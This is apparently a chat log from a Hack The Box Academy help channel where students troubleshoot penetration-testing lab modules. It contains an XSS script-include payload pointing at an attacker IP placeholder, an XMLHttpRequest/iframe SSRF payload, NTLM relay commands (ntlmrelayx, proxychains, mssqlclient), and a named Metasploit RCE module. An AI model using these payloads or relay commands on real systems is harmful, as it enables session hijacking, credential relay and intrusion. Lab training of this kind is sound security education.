Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      1/init              
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      4305/python2.7      
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      3703/sshd: /usr/sbi 
... ```

if i try to kill the python process with ``kill -9 4305`` it just restarts again. what should i do? i tried listening on the server with port 81 instead but i dont think that works for this module.

i also went to /etc/systemd/system to see if there was a service restarting it but there is no mention of "python" in the folder

port 80 on the pwnbox is what's serving you the vm to the browser

the module says port 80... pretty weird for them to do that if you literally cant use it

you can use 8000,8080

those are common alt ports for http

this is in the session hijacking part of the xss module, where we attempt to get <script src="http://OUR_IP/script.js"></script> to run on the server side, would running with port 8080 still work for that?

you'd need to add the port after OUR_IP

(OUR_IP:port)

yeah i did that

must be somewhere else im going wrong then

thanks for the help

Understanding Log Sources & Investigating with Splunk
Using Splunk Applications

Access the Sysmon App for Splunk and go to the "Reports" tab. Fix the search associated with the "Net - net view" report and provide the complete executed command as your answer. Answer format: net view /Domain:_.local

I found the command || sysmon process=net.exe (CommandLine="net view") | stats count by Computer,CommandLine || but it's not really related to the question I think I don't understand the question correctly

I’m stuck on the footprinting easy lab idk what to do any advice

enumerate

find open ports: figure out what you can do with those

scan both tcp & udp

read @fathom pendants bio

on windows privilege escalation module for the server_admin portion, are you suppose to crack the administrators password hash?

Have anyone of you guys went through all the Fundamental modules despite working in industry already? I am just doing it right now, refreshing some knowledge and making sure that I know the basics. Curious if someone else has done it.

ive gotten through most of it

Yeah i did it but their linux module sucks.

anyone can help me with ATTACKING COMMON APPLICATIONS - PRTG - Attack the PRTG target and gain remote code execution. Submit the contents of the flag.txt file on the administrator Desktop.?

In starting the point
How do I submit the root flag ?? 🤔

#starting-point is it's own section

but there's a text field in it

usually the last question of a machine

when I nmap -v "ip nr"

it says its down

what is "nr"

unless you're just referring to the IP

you don't need to specify saying "IP number"

IP

sorry

some windows machines don't respond to pings so needing to do -Pn

I tried but it gets stuck or something I have to cancel

"gets stuck"

maybe not stuck but didnt finish

some scans do take a few minutes

you just gotta have patience

ok

anyone? 🥹

you can press space to see progress

you'll get more flies if you actually ask your question

I remember u told me something about VM switches off , did you mean that I loose connection when I switch to Discord or other softwares or what ?

I created a notification like the one in the module, then I tried to run crackmapexec, but it didn't work

?

when you shut the vm down you need to reconnect to the vpn when you turn it back on

it has nothing to do with switching software

ah ok because I keep loosing the connection on HTB lab, dont understand why ..

then message website support/change vpn region

I don't know what I'm doing wrong

when I nmap -Pn It says all 1000 are in ignored states
tcp no response ...

Anyone regarding my question for crackmapexec please?

where

ps aux |grep openvpn if you have more than 1: then you're running multiple

also #starting-point is for the starting-point machines

:)

I meant actually helpful advice

i mean if you included what you've already tried, we can give you more pointed advice

otherwise it's a skill issue; the links in my BIO are for some good reads

https://dontasktoask.com is a good read on how to ask questions in a forum

@next bronze reharding the last 2 questions for the skill assement

If you cant tell where and how you are stuck, you asking other people to think for you

the most advice we can give with 0 info is: enumerate

double check the sections on revealed ports and how to get at them in a meaningful way

yes what is your question

we're not gonna tell you to "well do this first, then that, then this" because that defeats the purpose of you supposedly having learned this stuff from the module

🥺

@next bronze I can't answer the last 2 questions

do we have a troubleshooting forum for academy? I have being experiencing connections issues during different exercises. I did re-download the VPN file just in case and didn't work.

I scanned the box and I’m trying to find a way to dump the private key

Ineed some help hints, ....

I had only 1 =/

Nmap won’t give me a version on 2121

how am I supposed to give them when I don't know what you have and what you have tried

you don't need version

@next bronze Can I post here or is it spoiling?

ftp supports a command like "get"

just tell me what users you have, put it in spoiler tags

scan both tcp & udp

||james, juliette,intern30,svc_devadm,atul||

spoiler tag is || at both ends but check ||gmsa||

roger that

@next bronze I have that service account

Is there a reason I can't find the High Level Alert with ZAP Scanner for the Web Proxies module? I had to manually find the vulnerability and exploit it myself. I tried using active scans with full complete settings enabled on both my local machine and the pwnbox and got zero high alerts.

oh right, check what interesting programs is installed that can be abused

I reset the instance multiple times as well

@next bronze ok, I will try, thanks
I searched for keepass briefly but haven't found it, i will retry tomorrow

guys & girls, need help with the last question of NTLM Relay Module, lesson "NTLM Cross-protocol Relay Attacks". I've run: 1. sudo ntlmrelayx.py -tf relayTargets.txt -smb2support -socks (#after suod su -); 2. started the Responder 3. proxychains -q mssqlclient.py INLANEFREIGHT/nports@172.16.117.60 -windows-auth -no-pass (#this errors out as connection refused). Can someone point out to me where i went wrong?

that should be pretty obvious what you need to do, read the sections again

i am working the web proxies module and I experiencing connectivity issues trying to access the exercises. Had you have any issues with them?

read carefully: you do have creds

I haven't had any issues connecting

if it's the one with 2121

thnaks, I guess is something in my end then.

that's why i said read their bio, it will help you to ask the right question

ah my bad g

you should target mssql specifically in your relay targets

@next bronze thanks,
I probably missed somethingin the course

I tried that as well. I have also tried doing all://ip after switching responder's servers off, but both to no avail

try to follow the steps in the module, and make sure the username is right

this is my command: root@ubuntu:~# sudo ntlmrelayx.py -t mssql://INLANEFREIGHT\NPORTS@172.16.117.60 -smb2support -socks and the output is this: Connection from INLANEFREIGHT/NPORTS@172.16.117.3 controlled, but there are no more targets left

flip the \

pretty sure you're supposed to put only proto and ip in the ntlmrelax target: mssql://172.16.117.60

that's how it's taught in the lesson but I've tried both ways and still nothing

tried that as well but the only response is SMBD-Thread-67: Received connection from 172.16.117.3, attacking target mssql://172.16.117.60
[-] Connection against target mssql://172.16.117.60 FAILED: [('SSL routines', '', 'no protocols available')]

I've been at it since yesterday and it's slowly driving me crazy. Every other question went fine.

hm let me check it

Thank you, it might be something completely stupid on my part but I'd really like to know what it is then

for the server_adm section, are you suppose to crack the windows ntlm hash to get admin access?

for windows privilege escalation module

I just copied the 3 commands and it worked

you can always pth

Hello all - im doing xpath blind exploitation.
I have xfiled the nodes name but when i start exfiltrating the number of child nodes im confused by what I am reading. I know i have the right number of child nodes. But what does it mean we can return the the previous step? none of the previous steps do a successful message sent prompt when i try what i am told to reveal the schema

What is all this related to?

I just retried it and still not capturing socks with nports

Coding?

ah ok I see the problem

ntlmrelayx.py -t mssql://INLANEFREIGHT\\NPORTS@172.16.117.60 -smb2support -socks

computers

technology

Looking to get some help if possible. I'm going through the Web Enumeration section, within the

Ohh

Like all u guys want to be hackers?

Looking to get some help if possible. I'm going through the Web Enumeration section, within the "Cracking into Hack the Box". Trying to do a whatweb on the target, curl and a goBuster is all failing/timing out.. Would anyone know why?

failing and timing out? make sure the target is active as silly as that may sound if i understand your question

Target is indeed active, showing 80 minutes of life left. :/

can i see your command?

whatweb 83.136.253.251
ERROR Opening: http://83.136.253.251 - execution expired

Do i need to include the port? The example above didn't..

whatweb http://ip:port

try

yup, that worked. Assuming that would be teh same for Gobuster?

yes

gobuster dir -u http://83.136.253.251/ -w /usr/share/dirb/wordlists/common.txt

Error: error on running gobuster: unable to connect to http://83.136.253.251/: Get "http://83.136.253.251/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

ah yeah, adding the port fixed it. Thank you @lusty thicket

ok, i deserved the frustration. I tried this exact command but when i did with the domain and the user I misspelled the username (used the question spelling which is NPORT and not NPORTS)...

Thank you, it was kind of you

has anyone done the senior web app module?

im stuck and its not a technical thing but odd wording in the doc

im doing xpath exfiltration

happens, but check the usernames next time, both ntlmrelayx and responder output the usernames, also the first thing I asked you to do

Hackers can't splel

Likely the step just above. Or the previous section

it...doesnt work

i dont understand why whoever wrote this document didnt add an example..."step" there are none and you want me to plug this in where and how much of my payload to change?

2 days

I mean is it not the XPath code just above the image?

correct

and I added the /users/*[2] but in place of users i used the account i exfiled. i get user does not exist error

Try changing the =1 to =2

Which is what the image shows

Don't use brackets

See if you get info that way

Also discord is formatting your messages

count is a function

To prevent this. Wrap in backticks (`)

review the example image

Do what it's doing

yes if you mean the 1 and 2 are not after asterix also tried that

right?

I haven't done this module, just walking through how I'd approach it ¯_(ツ)_/¯

yeah

Just review what it's taught so far

will do just annoyed its because the writing is weird

It looks like it wants you to put that code into the bracket, not just the direct number

day 3

i have

its succssful but i dont get what it says

I'm back for more help.. I'm now on the Exploits section for Cracking into HTB and trying to nmap my target, although it comes up with the following..

$ nmap -sV 83.136.250.104
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-09 23:58 GMT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.20 seconds

I then try to add the -Pn Flag and it fails to provide more info..

$ nmap -sV -Pn  83.136.250.104
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-09 23:59 GMT
Nmap scan report for 83-136-250-104.uk-lon1.upcloud.host (83.136.250.104)
Host is up (0.0070s latency).
All 1000 scanned ports on 83-136-250-104.uk-lon1.upcloud.host (83.136.250.104) are in ignored states.
Not shown: 915 filtered tcp ports (no-response), 85 closed tcp ports (conn-refused)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.51 seconds

I'm trying to get the versioning of the services running on the domain, and I believe I should be using the -sV flag to pull this right?

You're given a public ip and port

Nmap won't be useful

Ah ok, so would nmap only be useful when you have just an IP and no port?

Explore different enumeration methods, i.e. visiting the page in a browser

Well. To be more specific, public ip = not internal - so throwing Nmap at it is like scanning a random website

Oh, so I've completely mis-understood the use case 😄 nmap is for internal IP's and Web Enumeration is for Public IP's?

If you want accuracy with Nmap in these cases you would be -p port

Basically, 99.999% of public facing ips are websites

And in the case of htb: it will almost always be one, unless directed otherwise

okie doke. Thank you! I'll keep plugging away at it! 😄

I suggest the intro to networking module

Also fwiw the module is called Getting Started, not Cracking into HTB (that's the name of the path you're doing)

That's how I know where you're at

Ah, my bad. I'm providing the path name

Appreciate it!

Module is generally in the title of the page or all the way at the top, then section name is well what part of the module you're doing

A lot of paths share modules

Ya, apologies. At least next time I'll be more accurate in telling people where specifically I'm asking for help. Thank you again!

it's not necessarily true, nmap is good for probing what ports are open and what services are running, in this case you were given one port so it's less effective. it all depends on the situation, you'll learn more on how to use it as you go further into the path

Not in the Cracking into HTB path. AFAIK that's only a few modules

ah right, meant the cpts path then

I dont think it includes network enumeration with nmap

After this module: highly recommended the information Security foundation path

The linux one can be a little frustrating

Has anyone attempted the Supply Chain Attacks: DevOps not so secret Module?

Ok, thank you. I'll be sure to check that out!

Just ask your question.
https://dontasktoask.com

I will say, you did a good job of providing what you've done so we can guide you better

I need assistance or guidence on this.

Thanks, I have an IT background. So fully relate to the pain of someone asking for help and providing little to no information.

An update, I have managed to find out a version and now seeking an exploit 🙂

OK. But you haven't actually stated your question, what you've done/tried

We can't help you if you don't provide us more than just "I'm stuck"

It's pretty simple from there if I remember

Now you've done it, watch me stuff it up! 😄

You'll find I tend to word things with a purpose

I trying to send a screen shot

To avoid spoiling as much as possible while still nudging

You need to link your main htb account to send screenshots #welcome

Its appreciated 🙂

It's this way to prevent skids and dumbasses from posting troll images

Not to mention. 9 times outta 10, the info is right in front of you

omg @fathom pendant and @lusty thicket i think i get the dns nameserver zone thing so when i typed in this: nslookup -query=AXFR inlanefreight.htb 10.129.87.222 and got that big list, we have the ns on that ip address and then there is a localhost address with ns in it as well, meaning there are 2!

does that sound accurate? sorry, just had a break through lol

For sure, sometimes you (I) end up overcomplicating it in my head

👍

"It can't be that simple"
Narrator: it was

ok still at a lost

sooooo.... new to HTBA. I am stuck in the windows event logs and find evil - looging basic. Trying to find the executable that triggered the event with ID 4624

follow instructions in #welcome to link; you'll need an HTB Labs account to link it

there is no account identifier for academy

took a while with my southern education lol

So this is what I have so far

replace the ip from the example with the ip of the spawned machine

:) if you didn't spawn the machine: then that will be why

How you spawn it

i suggest you do the "getting-started" module

and "introduction to academy" module

that explains how to interact with academy

but in short: green text that says "Click here to spawn target"

ngl, I'm struggling to find the right exploit to use... 😄

visit the webpage; it's kinda hard to miss

Ok, so im on the website, assuming it's a ||plugin exploit?||

yes

bingo

I just tweaked the search. I think I got it now.. jesus it's too late 😄

i'm not reading this for you

the spawn target is gonna be above the questions

I must be actually stupid, the exploit is failing because auth failed to the target.. Do I need to do multiple exploits here?

you don't need auth

it's only one exploit

This is the one I'm trying to use ||exploit/multi/http/wp_plugin_backup_guard_rce 2021-05-04 excellent Yes Wordpress Plugin Backup Guard - Authenticated Remote Code Execution||

oh my

I am so sorry....

well if the exploit says it needs to be authed and you dont have auth, then its not gunna be it

¯_(ツ)_/¯

I was just searching the wrong thing for the past 30 odd minutes...

simple

it's part of the plugin's name too

I told you... 😄 I was searching ||Wordpress|| not the bloody || plugin name||

Ok I am at this point trying to get Jenkins creditials

did you add the gitea and jenkins .inlanefreight.htb to your /etc/hosts?

And done, that was the hardest challenge yet. But at least I know how to use MSF now 😄

I really do appreciate the help @fathom pendant 🙂

np

yeah general advice with wp is that vulns are almost always going to be just plugins or themes. WP core vulns are pretty rare.

Awesome, thank you!

another dns zone to check essentially?

yes, now trying to go str8 jenkins

because it's 127.0.0.1

also careful with your screenshots as they can be spoilery

while you did block out the answer in the one, the answer is still contained in the other screenshot @shrewd hazel

:)

deleted 🙂

but what does it being localhost address have to do with it?

im confused on that seperation of dns zones here, or maybe thats the whole point why it was different lol

bc that was the give away to further investigate that one with the localhost ip

the IP controls 2 zones :)

and generally a zone will be tied to the same machine

its been added

just at app1

Hi - wondering if anyone can help. I'm trying to load the Pass The Hash Target, and it keeps hanging at Target Is Spawning. I've tried logging out fully and logging back in. Any ideas?

(my vpn is connected as well. I'

*I'll try re loading another VPN connection file

change vpn servers

will do

Hello 👋

Kindly can I have some help regarding injection attacks module assessment challenge I’m able to retrieve the local files but not able to access anything via http, I thought that the solution in combination between xpath injection and ssrf but cannot understand or think how to perform that as I tried some ways but no luck so any help please

Can anyone explain the following from the Web Requests mofule (POST section):

"as would be the case with a file uploaded through a GET request."

Can you upload a file through a GET request? Is it like, exfil through a GET request's field?

Kindly can help @misty current

@round sable kindly can u help

tried switching to new VPN, from udp to tcp, target still won't spawn

maybe change region to EU or some others?

I've also rebooted both my pc and vm

I'll try that

it can by encoding the file and sending it as a url parameter, but it's strange that it's included in the post section

It's comparing why POST is "better" than GET for file upload... so that can be done, cool beans thanks :))))

EU/TCP finally worked, maybe there's maintenance going on US servers

thanks for the help

waiting for the target to spawn after 30 whole minutes......

Yes

What do you mean by not being able to access anything via http? Have you retrieved the source of the internal application?

Down for me too. Their systems are down it usually takes a few hours to fix 😭

When using js code like the following to access the internal application, it always responds to me with ||host not found or connection refused on the other ports ||

<||script>
xhzeem = new XMLHttpRequest();
xhzeem.onload = function(){document.write(this.responseText);}
xhzeem.onerror = function(){document.write('failed!')}
xhzeem.open("GET","http://127.0.0.1:80");
xhzeem.send();
</script>||

||<iframe src=http://127.0.0.1:80></iframe>||

||But I was able to retrieve the /etc/passwd||

Ah, you haven't found the right ||port|| I believe nothing is running on 80

Also, make sure to cover sensitive information with spoilers

Don't want to spoil others yaknow?

Ah got it, many thanks bro and will make sure to cover sensitive info

There are two approaches you can take to find the ||serivce port||. I'll let you think about it. You can let me know if you are still stuck.

Nice, you can directly edit it and hide them with spoilers

It has returned the prophecy can continue!

Not for me rippppp

There is a URL payload that executes XSS due to prototype pollution.
I have identified an operation that the administrator can execute, but I can't think of a way to exploit it. Is there a way to...
The question is Client-Side Prototype Pollution in the Whitebox Attacks module.

Haven't done the module but, if you got XSS, first thing that comes to my mind is CSRF.

But, again. I haven't done it and I'm giving you ideas.

can anyone help me??

ACL Abuse section, I'm getting an error:

This is following the lesson verbatim, with the exception of picking my password for the wley user

Ignore teh first error.

really?

The machine is slow

I entered the command twice

"I followed everything except I made up a password for the user im authenticating as, why am I getting an error that the username or password is incorrect?"

So the second error in red is the one.